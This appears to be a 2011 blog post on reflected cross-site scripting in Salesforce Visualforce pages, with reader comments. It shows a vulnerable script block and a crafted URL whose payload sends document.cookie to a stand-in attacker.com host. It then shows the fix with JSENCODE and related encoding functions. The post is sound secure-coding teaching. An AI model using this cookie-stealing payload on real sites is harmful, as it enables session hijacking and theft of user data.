Saturday, 19 February 2011

Salesforce applications with security: Reflected XSS

XSS is also known as cross-site scripting. XSS allows an attacker to inject his code into the client-side script. It is a web application vulnerability that allows an attacker to bypass the sharing rules; by doing this he can also expose sensitive data, session cookies, etc.

Now coming back to reflected XSS: it affects the page while the page is loading. Suppose I have a block of script and I want it executed on page load. This is known as reflected XSS.

Let's have a close look.
Here is a page; in the script block we are fetching the id parameter:
<apex:page>
<script>
var xssExample = '{!$CurrentPage.Parameters.id}' ;
</script>
</apex:page>

Now have a deeper look.
The page is called as:
/apex/TestPage?id=idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So when the page is loaded, it will be executed in the following manner:
var xssExample = '{!$CurrentPage.Parameters.id}' ;
Putting the id value from the request parameter in place of the merge field:
var xssExample = 'idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So here you can see that all the cookies will be sent to the attacker.com site.

To prevent this, Salesforce provides some encoding functions that are available on Visualforce pages, such as:
JSENCODE, HTMLENCODE, JSINHTMLENCODE, URLENCODE, etc.

So the code explained above can be updated as:
var xssExample = '{!JSENCODE($CurrentPage.Parameters.id)}' ;

So the value fetched from the request parameter will be encoded now.
JSENCODE: To encode values placed inside JavaScript.
HTMLENCODE: To encode values rendered in HTML.
JSINHTMLENCODE: If calling a JavaScript method from an HTML component and passing the values.
URLENCODE: If building a URL on the page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.

3 comments:

  1. Here is the source of information :
    http://en.wikipedia.org/wiki/Cross-site_scripting
    http://wiki.developerforce.com/index.php/Secure_Coding_Cross_Site_Scripting

  2. Indeed a helpful post for those who publish their app on AppExchange.

    http://forceguru.blogspot.com/
    http://tinyurl.com/forceguru

  3. Hi Bhawani,
    If we do encoding in JavaScript, say ({!JSENCODE($CurrentPage.Parameters.id)}), and again we need to send it by URL parameter, in that case, do we have to get it by decoding it?
